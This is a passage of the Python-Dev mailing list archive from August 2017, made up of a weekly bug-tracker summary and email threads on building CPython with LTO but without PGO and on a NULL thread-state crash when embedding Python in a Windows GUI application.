From status at bugs.python.org Fri Aug 4 12:09:20 2017 From: status at bugs.python.org (Python tracker) Date: Fri, 4 Aug 2017 18:09:20 +0200 (CEST) Subject: [Python-Dev] Summary of Python tracker Issues Message-ID: <20170804160920.A5F1511A85F@psf.upfronthosting.co.za> ACTIVITY SUMMARY (2017-07-28 - 2017-08-04) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 6100 (+12) closed 36774 (+38) total 42874 (+50) Open issues with patches: 2337 Issues opened (33) ================== #29910: Ctrl-D eats a character on IDLE http://bugs.python.org/issue29910 reopened by terry.reedy #31072: add filter to zipapp http://bugs.python.org/issue31072 opened by irmen #31073: Change metadata handling in check command http://bugs.python.org/issue31073 opened by jambonrose #31074: Startup failure if executable is a \\?\ path on Windows http://bugs.python.org/issue31074 opened by eryksun #31075: Collections - ChainMap - Documentation example wrong order lin http://bugs.python.org/issue31075 opened by Marcos Soutullo #31076: http.server should correctly handle HTTP 1.1 responses without http://bugs.python.org/issue31076 opened by Tom Forbes #31078: pdb's debug command (Pdb.do_debug) doesn't use rawinput even i http://bugs.python.org/issue31078 opened by Segev Finer #31082: reduce takes iterable, not just sequence http://bugs.python.org/issue31082 opened by Stefan Pochmann #31087: asyncio.create_subprocess_* do not honor `encoding` http://bugs.python.org/issue31087 opened by toriningen #31088: regrtest.py: "${test_file_name} skipped" message printed twice http://bugs.python.org/issue31088 opened by Arfrever #31092: Potential multiprocessing.Manager() race condition http://bugs.python.org/issue31092 opened by Prof Plum #31093: IDLE: Add tests for configdialog extensions tab http://bugs.python.org/issue31093 opened by terry.reedy #31094: asyncio: get list of connected clients http://bugs.python.org/issue31094 opened by Dmitry Vinokurov #31095: Checking all tp_dealloc with Py_TPFLAGS_HAVE_GC http://bugs.python.org/issue31095 opened by inada.naoki #31096: asyncio.stream.FlowControlMixin._drain_helper may lead to a bl http://bugs.python.org/issue31096 opened by malinoff #31097: itertools.islice not accepting np.int64 http://bugs.python.org/issue31097 opened by braaannigan #31098: test target of Makefile always run tests in parallel mode http://bugs.python.org/issue31098 opened by Arfrever #31100: unable to open python http://bugs.python.org/issue31100 opened by Kenneth Griffin #31102: deheader: double #incude of the same file http://bugs.python.org/issue31102 opened by dilyan.palauzov #31103: Windows Installer Product Version 3.6.2150.0 Offset By 0.0.150 http://bugs.python.org/issue31103 opened by Markus Kramer #31105: Cyclic GC threshold may need tweaks http://bugs.python.org/issue31105 opened by arigo #31106: os.posix_fallocate() generate exception with errno 0 http://bugs.python.org/issue31106 opened by socketpair #31107: copyreg does not properly mangle __slots__ names http://bugs.python.org/issue31107 opened by ShaneHarvey #31108: add __contains__ for list_iterator (and others) for better per http://bugs.python.org/issue31108 opened by sir-sigurd #31109: zipimport argument clinic conversion http://bugs.python.org/issue31109 opened by jarondl #31113: Stack overflow with large program http://bugs.python.org/issue31113 opened by Wheerd #31114: 'make install' fails when exec_prefix is '/' and 
DESTDIR not e
http://bugs.python.org/issue31114  opened by xdegaye

#31115: Py3.6 threading/reference counting issues with `numexpr`
http://bugs.python.org/issue31115  opened by Robert McLeod

#31116: base85 z85 variant encoding
http://bugs.python.org/issue31116  opened by underrun

#31118: Make super() work with staticmethod by using __class__ for bot
http://bugs.python.org/issue31118  opened by ashwch

#31119: Signal tripped flags need memory barriers
http://bugs.python.org/issue31119  opened by njs

#31120: [2.7] Python 64 bit _ssl compile fails due missing buildinf_am
http://bugs.python.org/issue31120  opened by hirenvadalia

#31121: Unable to exit pdb when script becomes invalid
http://bugs.python.org/issue31121  opened by jason.coombs

Most recent 15 issues with no replies (15)
==========================================

#31121: Unable to exit pdb when script becomes invalid
http://bugs.python.org/issue31121

#31119: Signal tripped flags need memory barriers
http://bugs.python.org/issue31119

#31118: Make super() work with staticmethod by using __class__ for bot
http://bugs.python.org/issue31118

#31116: base85 z85 variant encoding
http://bugs.python.org/issue31116

#31115: Py3.6 threading/reference counting issues with `numexpr`
http://bugs.python.org/issue31115

#31114: 'make install' fails when exec_prefix is '/' and DESTDIR not e
http://bugs.python.org/issue31114

#31098: test target of Makefile always run tests in parallel mode
http://bugs.python.org/issue31098

#31096: asyncio.stream.FlowControlMixin._drain_helper may lead to a bl
http://bugs.python.org/issue31096

#31094: asyncio: get list of connected clients
http://bugs.python.org/issue31094

#31093: IDLE: Add tests for configdialog extensions tab
http://bugs.python.org/issue31093

#31092: Potential multiprocessing.Manager() race condition
http://bugs.python.org/issue31092

#31087: asyncio.create_subprocess_* do not honor `encoding`
http://bugs.python.org/issue31087

#31082: reduce takes iterable, not just sequence
http://bugs.python.org/issue31082

#31078: pdb's debug command (Pdb.do_debug) doesn't use rawinput even i
http://bugs.python.org/issue31078

#31070: test_threaded_import: KeyError ignored in _get_module_lock.
http://bugs.python.org/issue31070

From octavian.soldea at intel.com  Mon Aug  7 2017
From: octavian.soldea at intel.com (Soldea, Octavian)
Subject: [Python-Dev] first post introduction and question regarding lto
Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com>

Hello

This is my first post after having just subscribed to the Python-Dev
mailing list. In this context, the welcome confirmation message suggested
that I introduce myself.

My name is Octavian Soldea and I am with the Python optimization team in
the DSLOT group at Intel, Santa Clara, California. I received a PhD in
Computer Science, in the area of Computer Vision, from the Technion,
Israel Institute of Technology.

I would like to ask about the possibility of compiling Python with lto
only. My question is: is the community interested in enabling the
possibility of compiling Python with lto only, i.e. without pgo? I have
followed

https://bugs.python.org/issue29243

and

https://bugs.python.org/issue29641

but it is not clear whether such a separate compilation mode is already
implemented. In my opinion this is a good option, since pgo is not always
desired.

Best regards,
Octavian
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
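For reference, both build modes under discussion map to existing
./configure switches; as a sketch (assuming a GCC or Clang toolchain),
the difference is:

    ./configure --enable-optimizations   # pgo: build, run the test suite
                                         # as a profiling workload, rebuild
    ./configure --with-lto               # lto only, no profiling run
    make

Whether the second form actually propagates the LTO flags to every build
target without the PGO machinery is exactly the question raised in this
thread.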
From greg at krypto.org  Mon Aug  7 18:12:22 2017
From: greg at krypto.org (Gregory P. Smith)
Date: Mon, 07 Aug 2017 22:12:22 +0000
Subject: [Python-Dev] first post introduction and question regarding lto
In-Reply-To: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com>
References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com>
Message-ID:

I've personally never seen a situation where PGO is not desired yet some
other fancier optimization such as LTO is. When do you encounter people
wanting that? PGO always produces a 10-20% faster CPython interpreter.

I have no problem with patches enabling an LTO-only build for anyone who
wants one, if they do not already exist. At the moment I'm not sure which
LTO toolchains actually work properly. We removed it from inclusion in
--enable-optimizations because it was clearly broken in some common
environments.

If LTO without PGO is useful, making it work is probably just a matter of
making sure @LTOFLAGS@ show up on the non-PGO related Makefile.pre.in
targets, as well as updating the help text for --with-lto in configure.ac.
[untested]

-gps

On Mon, Aug 7, 2017 at 12:00 PM Soldea, Octavian wrote:
>
> Hello
>
> This is my first post after having just subscribed to the Python-Dev
> mailing list. In this context, the welcome confirmation message
> suggested that I introduce myself.
>
> My name is Octavian Soldea and I am with the Python optimization team in
> the DSLOT group at Intel, Santa Clara, California. I received a PhD in
> Computer Science, in the area of Computer Vision, from the Technion,
> Israel Institute of Technology.
>
> I would like to ask about the possibility of compiling Python with lto
> only. My question is: is the community interested in enabling the
> possibility of compiling Python with lto only, i.e. without pgo? I have
> followed
>
> https://bugs.python.org/issue29243
>
> and
>
> https://bugs.python.org/issue29641
>
> but it is not clear whether such a separate compilation mode is already
> implemented. In my opinion this is a good option, since pgo is not
> always desired.
>
> Best regards,
> Octavian
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe:
> https://mail.python.org/mailman/options/python-dev/greg%40krypto.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From octavian.soldea at intel.com  Mon Aug  7 19:01:42 2017
From: octavian.soldea at intel.com (Soldea, Octavian)
Date: Mon, 7 Aug 2017 23:01:42 +0000
Subject: [Python-Dev] first post introduction and question regarding lto
In-Reply-To:
References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com>
Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com>

Hello

Gregory: Thank you for your message. I really appreciate it.

In my opinion, an lto-only compilation mode can be of benefit for at
least two reasons:

1. Lto only can provide a platform for experimentation. Of course, the
benefit seems to be very application specific.

2. Lto-only compilation is faster than a full pgo + lto build. While pgo
can take a lot of time, lto can provide significant optimizations over
the baseline at the cost of less compilation time. Lto is itself time
consuming, but to the best of my knowledge, compiling with lto only is
still shorter than combining pgo and lto.

In this context, I will be more than happy to receive more feedback and
opinions.

Best regards,
Octavian

From: Gregory P.
Smith [mailto:greg at krypto.org] Sent: Monday, August 7, 2017 3:12 PM To: Soldea, Octavian ; Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I've personally never seen a situation where PGO is not desired yet some other fancier optimization such as LTO is. When do you encounter people wanting that? PGO always produces a 10-20% faster CPython interpreter. I have no problem with patches enabling an LTO only build for anyone who wants one if they do not already exist. At the moment I'm not sure which LTO toolchains actually work properly. We removed it from inclusion in --enable-optimizations because it was clearly broken in some common environments. If LTO without PGO is useful, making it work is probably just a matter of making sure @LTOFLAGS@ show up on the non-PGO related Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. [untested] -gps Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/greg%40krypto.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From victor.stinner at gmail.com Mon Aug 7 19:43:19 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Tue, 8 Aug 2017 01:43:19 +0200 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> Message-ID: I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit from > two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, lto > is time consuming. To the best of my knowledge, compiling with lto only is > shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback and > opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian ; Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question regarding lto > > > > I've personally never seen a situation where PGO is not desired yet some > other fancier optimization such as LTO is. When do you encounter people > wanting that? PGO always produces a 10-20% faster CPython interpreter. 
> > > > I have no problem with patches enabling an LTO only build for anyone who > wants one if they do not already exist. At the moment I'm not sure which > LTO toolchains actually work properly. We removed it from inclusion in > --enable-optimizations because it was clearly broken in some common > environments. > > > > If LTO without PGO is useful, making it work is probably just a matter of > making sure @LTOFLAGS@ show up on the non-PGO related Makefile.pre.in > targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gmail.com > From peter.xihong.wang at intel.com Mon Aug 7 20:00:10 2017 From: peter.xihong.wang at intel.com (Wang, Peter Xihong) Date: Tue, 8 Aug 2017 00:00:10 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> Message-ID: <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> We evaluated different tests before setting down and proposing regrtest suite for PGO training, including using OpenStack benchmarks for OpenStack applications. The regrtest suite was found consistently giving the best in terms of performance across applications/workloads. So I would hesitate to remove any test from the training suite (for the purpose of reducing build time), unless we are absolute sure it will not hurt performance across the board. Thanks, Peter -----Original Message----- From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang=intel.com at python.org] On Behalf Of Victor Stinner Sent: Monday, August 07, 2017 4:43 PM To: Soldea, Octavian Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit > from two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, > lto is time consuming. To the best of my knowledge, compiling with lto > only is shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback > and opinions. 
> > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian ; > Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question > regarding lto > > > > I've personally never seen a situation where PGO is not desired yet > some other fancier optimization such as LTO is. When do you encounter > people wanting that? PGO always produces a 10-20% faster CPython interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone > who wants one if they do not already exist. At the moment I'm not > sure which LTO toolchains actually work properly. We removed it from > inclusion in --enable-optimizations because it was clearly broken in > some common environments. > > > > If LTO without PGO is useful, making it work is probably just a matter > of making sure @LTOFLAGS@ show up on the non-PGO related > Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > ail.com > _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com From octavian.soldea at intel.com Mon Aug 7 20:07:31 2017 From: octavian.soldea at intel.com (Soldea, Octavian) Date: Tue, 8 Aug 2017 00:07:31 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Hello Thank you for your messages. I am not quite sure I understood, therefore, I would like to ask if you see beneficial to have the option of lto separately? Best regards, Octavian -----Original Message----- From: Wang, Peter Xihong Sent: Monday, August 7, 2017 5:00 PM To: Victor Stinner ; Soldea, Octavian Cc: Python-Dev at python.org Subject: RE: [Python-Dev] first post introduction and question regarding lto We evaluated different tests before setting down and proposing regrtest suite for PGO training, including using OpenStack benchmarks for OpenStack applications. The regrtest suite was found consistently giving the best in terms of performance across applications/workloads. So I would hesitate to remove any test from the training suite (for the purpose of reducing build time), unless we are absolute sure it will not hurt performance across the board. 
Thanks, Peter -----Original Message----- From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang=intel.com at python.org] On Behalf Of Victor Stinner Sent: Monday, August 07, 2017 4:43 PM To: Soldea, Octavian Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit > from two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, > lto is time consuming. To the best of my knowledge, compiling with lto > only is shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback > and opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian ; > Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question > regarding lto > > > > I've personally never seen a situation where PGO is not desired yet > some other fancier optimization such as LTO is. When do you encounter > people wanting that? PGO always produces a 10-20% faster CPython interpreter. > > > > I have no problem with patches enabling an LTO only build for anyone > who wants one if they do not already exist. At the moment I'm not > sure which LTO toolchains actually work properly. We removed it from > inclusion in --enable-optimizations because it was clearly broken in > some common environments. > > > > If LTO without PGO is useful, making it work is probably just a matter > of making sure @LTOFLAGS@ show up on the non-PGO related > Makefile.pre.in targets as well as updating the help text for --with-lto in configure.ac. > [untested] > > > > -gps > > > > > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm > ail.com > _______________________________________________ Python-Dev mailing list Python-Dev at python.org https://mail.python.org/mailman/listinfo/python-dev Unsubscribe: https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com From greg at krypto.org Mon Aug 7 20:12:52 2017 From: greg at krypto.org (Gregory P. 
Smith) Date: Tue, 08 Aug 2017 00:12:52 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: I don't know whether it is beneficial or not - but having the capability to build LTO without PGO seems reasonable. I can review any pull requests altering configure.ac and Makefile.pre.in to make such a change. - at gpshead On Mon, Aug 7, 2017 at 5:08 PM Soldea, Octavian wrote: > Hello > > Thank you for your messages. I am not quite sure I understood, therefore, > I would like to ask if you see beneficial to have the option of lto > separately? > > Best regards, > Octavian > > > > > > > -----Original Message----- > From: Wang, Peter Xihong > Sent: Monday, August 7, 2017 5:00 PM > To: Victor Stinner ; Soldea, Octavian < > octavian.soldea at intel.com> > Cc: Python-Dev at python.org > Subject: RE: [Python-Dev] first post introduction and question regarding > lto > > We evaluated different tests before setting down and proposing regrtest > suite for PGO training, including using OpenStack benchmarks for OpenStack > applications. The regrtest suite was found consistently giving the best in > terms of performance across applications/workloads. > > So I would hesitate to remove any test from the training suite (for the > purpose of reducing build time), unless we are absolute sure it will not > hurt performance across the board. > > Thanks, > > Peter > > -----Original Message----- > From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang= > intel.com at python.org] On Behalf Of Victor Stinner > Sent: Monday, August 07, 2017 4:43 PM > To: Soldea, Octavian > Cc: Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question regarding > lto > > I don't think that PGO compilation itself is slow. Basically, I expect > that it only doubles the compilation time, but compiling Python takes less > than 1 minute usually. The slow part is the profiling task: run the full > Python test suite, which takes at least 20 minutes. The tests must be run > sequentially. > > It would help to reduce the number of tests run in the profiling task. > We should also maybe skip tests which depend too much on I/O to get more > reproductible PGO performances. > > Victor > > 2017-08-08 1:01 GMT+02:00 Soldea, Octavian : > > Hello > > > > > > > > Gregory: Thank you for your message. I really appreciate it. > > > > > > > > In my opinion the use of lto only compilation mode can be of benefit > > from two reasons at least: > > > > 1. Lto only can provide a platform for experimentations. Of > course, it > > seems to be very application specific. > > > > 2. Lto compilation is faster than an entire pgo + lto mode. While > pgo > > can take a lot of time, lto can provide significant optimizations, as > > compared to baseline, at the cost of less compilation time. Of course, > > lto is time consuming. To the best of my knowledge, compiling with lto > > only is shorter than combining pgo and lto. > > > > > > > > In this context, I will be more than happy to receive more feedback > > and opinions. > > > > > > > > Best regards, > > > > Octavian > > > > > > > > > > > > > > > > > > > > From: Gregory P. 
Smith [mailto:greg at krypto.org]
> > Sent: Monday, August 7, 2017 3:12 PM
> > To: Soldea, Octavian ;
> > Python-Dev at python.org
> > Subject: Re: [Python-Dev] first post introduction and question
> > regarding lto
> >
> > I've personally never seen a situation where PGO is not desired yet
> > some other fancier optimization such as LTO is. When do you encounter
> > people wanting that? PGO always produces a 10-20% faster CPython
> interpreter.
> >
> > I have no problem with patches enabling an LTO only build for anyone
> > who wants one if they do not already exist. At the moment I'm not
> > sure which LTO toolchains actually work properly. We removed it from
> > inclusion in --enable-optimizations because it was clearly broken in
> > some common environments.
> >
> > If LTO without PGO is useful, making it work is probably just a matter
> > of making sure @LTOFLAGS@ show up on the non-PGO related
> > Makefile.pre.in targets as well as updating the help text for
> --with-lto in configure.ac.
> > [untested]
> >
> > -gps
> >
> >
> > Python-Dev mailing list
> > Python-Dev at python.org
> > https://mail.python.org/mailman/listinfo/python-dev
> > Unsubscribe:
> > https://mail.python.org/mailman/options/python-dev/greg%40krypto.org
> >
> >
> > _______________________________________________
> > Python-Dev mailing list
> > Python-Dev at python.org
> > https://mail.python.org/mailman/listinfo/python-dev
> > Unsubscribe:
> > https://mail.python.org/mailman/options/python-dev/victor.stinner%40gm
> > ail.com
> >
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe:
> https://mail.python.org/mailman/options/python-dev/peter.xihong.wang%40intel.com
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe:
> https://mail.python.org/mailman/options/python-dev/greg%40krypto.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From patrick.rutkowski at gmail.com  Mon Aug  7 20:11:13 2017
From: patrick.rutkowski at gmail.com (Patrick Rutkowski)
Date: Mon, 7 Aug 2017 20:11:13 -0400
Subject: [Python-Dev] PyThreadState_GET() returns NULL from within
 PyImport_GetModuleDict()
Message-ID:

I'm working on Windows. I have the following dead simple embedding
code that I'm using to test out the python interpreter:

============================================================

Py_SetProgramName(L"MyApp");

Py_SetPath(
    L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64\\python36.zip;"
    L"C:\\Users\\rutski\\Documents\\python\\DLLs;"
    L"C:\\Users\\rutski\\Documents\\python\\lib;"
    L"C:\\Users\\rutski\\Documents\\python\\PCBuild\\amd64;"
    L"C:\\Users\\rutski\\Documents\\python;"
    L"C:\\Users\\rutski\\Documents\\python\\lib\\site-packages");

Py_Initialize();

PyRun_SimpleString(
    "from time import time,ctime\n"
    "print('Today is', ctime(time()))\n");

============================================================

This code crashes trying to access address 0x00000010 from within
PyRun_SimpleString(). The sequence of events is this:

1) PyRun_SimpleString() tries to do AddModule("__main__")
2) AddModule tries to do PyImport_GetModuleDict()
3) PyImport_GetModuleDict() tries to do PyThreadState_GET()->interp
4) PyThreadState_GET() returns NULL, so the ->interp part crashes.
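That fault address is itself a clue. A sketch of why it is 0x10
specifically, based on the thread-state layout in CPython 3.6's
Include/pystate.h (abridged here; the offsets are an assumption for a
64-bit build, not something taken from a debugger in this thread):

/* Abridged from Include/pystate.h (CPython 3.6); offsets assume amd64. */
typedef struct _ts {
    struct _ts *prev;              /* offset 0  */
    struct _ts *next;              /* offset 8  */
    PyInterpreterState *interp;    /* offset 16 == 0x10 */
    /* ... remaining fields elided ... */
} PyThreadState;

/* With a NULL thread state, PyThreadState_GET()->interp dereferences
 * (char *)NULL + 0x10 -- which matches the reported access to address
 * 0x00000010. */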
The weird thing is that calling PyImport_GetModuleDict() from within my application directly works just fine. Weirder still is that the whole thing actually executes fine if I build a windows command line application with the embed code in main(), and execute it from a terminal. The crash only happens when building a Windows GUI application and calling the embed code in WinMain(). This is a python interpreter that I built from source on windows using PCbuild\build.bat, so that I could track the crash. However, the exact same crash was happening with the stock interpreter provided by the python windows installer. Does anyone have any ideas here? -Patrick From octavian.soldea at intel.com Mon Aug 7 20:40:08 2017 From: octavian.soldea at intel.com (Soldea, Octavian) Date: Tue, 8 Aug 2017 00:40:08 +0000 Subject: [Python-Dev] first post introduction and question regarding lto In-Reply-To: References: <43B1ED10B7DEE34098E869FDC5A400A32BAB251E@ORSMSX115.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB280D@ORSMSX115.amr.corp.intel.com> <371EBC7881C7844EAAF5556BFF21BCCC830DDE97@ORSMSX105.amr.corp.intel.com> <43B1ED10B7DEE34098E869FDC5A400A32BAB28B6@ORSMSX115.amr.corp.intel.com> Message-ID: <43B1ED10B7DEE34098E869FDC5A400A32BAB2914@ORSMSX115.amr.corp.intel.com> Hi Gregory Thank you for your message. I will conduct several experiments and try to come back as soon as possible with a conclusion. Best regards, Octavian From: Gregory P. Smith [mailto:greg at krypto.org] Sent: Monday, August 7, 2017 5:13 PM To: Soldea, Octavian ; Wang, Peter Xihong ; Victor Stinner Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't know whether it is beneficial or not - but having the capability to build LTO without PGO seems reasonable. I can review any pull requests altering configure.ac and Makefile.pre.in to make such a change. - at gpshead On Mon, Aug 7, 2017 at 5:08 PM Soldea, Octavian > wrote: Hello Thank you for your messages. I am not quite sure I understood, therefore, I would like to ask if you see beneficial to have the option of lto separately? Best regards, Octavian -----Original Message----- From: Wang, Peter Xihong Sent: Monday, August 7, 2017 5:00 PM To: Victor Stinner >; Soldea, Octavian > Cc: Python-Dev at python.org Subject: RE: [Python-Dev] first post introduction and question regarding lto We evaluated different tests before setting down and proposing regrtest suite for PGO training, including using OpenStack benchmarks for OpenStack applications. The regrtest suite was found consistently giving the best in terms of performance across applications/workloads. So I would hesitate to remove any test from the training suite (for the purpose of reducing build time), unless we are absolute sure it will not hurt performance across the board. Thanks, Peter -----Original Message----- From: Python-Dev [mailto:python-dev-bounces+peter.xihong.wang=intel.com at python.org] On Behalf Of Victor Stinner Sent: Monday, August 07, 2017 4:43 PM To: Soldea, Octavian > Cc: Python-Dev at python.org Subject: Re: [Python-Dev] first post introduction and question regarding lto I don't think that PGO compilation itself is slow. Basically, I expect that it only doubles the compilation time, but compiling Python takes less than 1 minute usually. The slow part is the profiling task: run the full Python test suite, which takes at least 20 minutes. The tests must be run sequentially. It would help to reduce the number of tests run in the profiling task. 
We should also maybe skip tests which depend too much on I/O to get more reproductible PGO performances. Victor 2017-08-08 1:01 GMT+02:00 Soldea, Octavian >: > Hello > > > > Gregory: Thank you for your message. I really appreciate it. > > > > In my opinion the use of lto only compilation mode can be of benefit > from two reasons at least: > > 1. Lto only can provide a platform for experimentations. Of course, it > seems to be very application specific. > > 2. Lto compilation is faster than an entire pgo + lto mode. While pgo > can take a lot of time, lto can provide significant optimizations, as > compared to baseline, at the cost of less compilation time. Of course, > lto is time consuming. To the best of my knowledge, compiling with lto > only is shorter than combining pgo and lto. > > > > In this context, I will be more than happy to receive more feedback > and opinions. > > > > Best regards, > > Octavian > > > > > > > > > > From: Gregory P. Smith [mailto:greg at krypto.org] > Sent: Monday, August 7, 2017 3:12 PM > To: Soldea, Octavian >; > Python-Dev at python.org > Subject: Re: [Python-Dev] first post introduction and question > regarding lto > > > > I've personally never seen a situation where PGO is not desired yet > some other fancier optimization such as LTO is. When do you encounter > people wanting that? PGO always produces a 10-20% faster CPython 